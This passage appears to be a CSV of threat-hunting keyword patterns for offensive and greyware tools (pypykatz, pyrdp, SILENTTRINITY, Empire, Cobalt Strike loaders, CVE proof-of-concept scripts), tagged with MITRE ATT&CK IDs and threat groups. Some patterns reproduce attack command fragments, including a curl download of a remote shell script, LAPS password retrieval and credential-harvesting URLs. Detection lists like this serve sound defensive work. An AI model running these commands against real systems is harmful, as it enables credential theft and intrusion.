+"*PyExec-main.*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*pygpoabuse * -hashes lm:* -gpo-id *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pygpoabuse.py*","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"*pyherion.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","0","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*pyinstaller *.py*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyinstaller netexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*pyinstaller.exe*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyinstaller/tarball*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyinstaller-script.py*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*pyLAPS.py --action get -d * -u * -p * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyLAPS-main*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*pyMalleableC2*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" +"*pymultitor*","offensive_tool_keyword","pymultitor","Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP","T1071.001 - T1071.004 - T1055.008","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/realgam3/pymultitor","1","0","N/A","N/A","6","543","116","2022-08-28T22:06:01Z","2013-09-28T15:55:49Z" +"*pypykatz *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz lsa minidump *","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*pypykatz lsa minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","0","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.commons*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.dpapi*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.exe*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.git*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.kerberos*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.lsadecryptor*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz.registry*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatz_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*pypykatz_rekall.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pypykatzClass*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*pypykatzfile*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*pypykatz-master.zip*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*pyrdp_output -*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-clonecert.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-convert.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-mitm.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-player.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrit -e * create_essid*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyrit -i *.txt import_passwords*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyrit -r *.pcap attack_db*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyrit -r *.pcap -b * -i *.txt attack_passthrough*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pysoserial.py*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*Pysoserial-main*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*PySplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*pystinger_for_darkshadow*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*python 3 st teamserver *","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python -m http.server*","greyware_tool_keyword","http.server","setup a simple http server","T1021.005 - T1049","TA0009 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*python -m orbitaldump *","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*python -m rarce *","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*python -m SimpleHTTPServer*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*python noPac.*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*python rsf.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*python scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*python st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*python* pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"*python*charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*python*http://*:6970/ConfigFileCacheList.txt*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*python*'http://*SEP*:6970/*.cnf.xml*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*python*https://*:8443/cucm-uds/users?name=*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*python_modules/keyboard.zip*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*python2??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python2??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python3 